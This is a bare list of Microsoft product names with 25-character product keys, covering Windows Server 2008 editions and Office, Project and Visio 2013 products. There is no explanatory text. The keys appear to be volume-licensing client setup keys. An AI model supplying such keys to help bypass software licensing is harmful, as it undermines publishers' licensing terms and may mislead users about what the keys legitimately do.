Windows Web Server 2008                                WYR28-R7TFJ-3X2YQ-YCY4H-M249D
Windows Server 2008 Standard                        TM24T-X9RMF-VWXK6-X8JC9-BFGM2
Windows Server 2008 Standard without Hyper-V        W7VD6-7JFBR-RX26B-YKQ3Y-6FFFJ
Windows Server 2008 Enterprise                        YQGMW-MPWTJ-34KDK-48M3W-X4Q6V
Windows Server 2008 Enterprise without Hyper-V        39BXF-X8Q23-P2WWT-38T2F-G3FPG
Windows Server 2008 HPC                                RCTX3-KWVHP-BR6TB-RB6DM-6X7HP
Windows Server 2008 Datacenter                        7M67G-PC374-GR742-YH8V4-TCBY3
Windows Server 2008 Datacenter without Hyper-V        22XQ2-VRXRG-P8D42-K34TD-G3QQC
Windows Server 2008 for Itanium-Based Systems        4DWFP-JF3DJ-B7DTH-78FJB-PDRHK
Office 2013 Professional Plus            YC7DK-G2NP3-2QQC3-J6H88-GVGXT
Office 2013 Standard                    KBKQT-2NMXY-JJWGP-M62JB-92CD4
Project 2013 Professional                FN8TT-7WMH6-2D4X9-M337T-2342K
Project 2013 Standard                    6NTH3-CW976-3G3Y2-JK3TX-8QHTT
Visio 2013 Professional                    C2FG9-N6J68-H8BTJ-BW3QX-RM3B3
Visio 2013 Standard                        J484Y-4NKBF-W2HMG-DBMJC-PGWR7
Access 2013                                NG2JY-H4JBT-HQXYP-78QH9-4JM2D
Excel 2013                                VGPNG-Y7HQW-9RHP7-TKPV3-BG7GB
InfoPath 2013                            DKT8B-N7VXH-D963P-Q4PHY-F8894
Lync 2013                                2MG3G-3BNTT-3MFW9-KDQW3-TCK7R
OneNote 2013                            TGN6P-8MMBC-37P2F-XHXXK-P34VW
Outlook 2013                            QPN8Q-BJBTJ-334K3-93TGY-2PMBT
PowerPoint 2013                            4NT99-8RJFH-Q2VDH-KYG2C-4RD4F
Publisher 2013                            PN2WF-29XG2-T9HJ7-JQPJR-FCXK4
Word 2013                                6Q7VD-NX8JD-WJ2VH-88V73-4GBJ7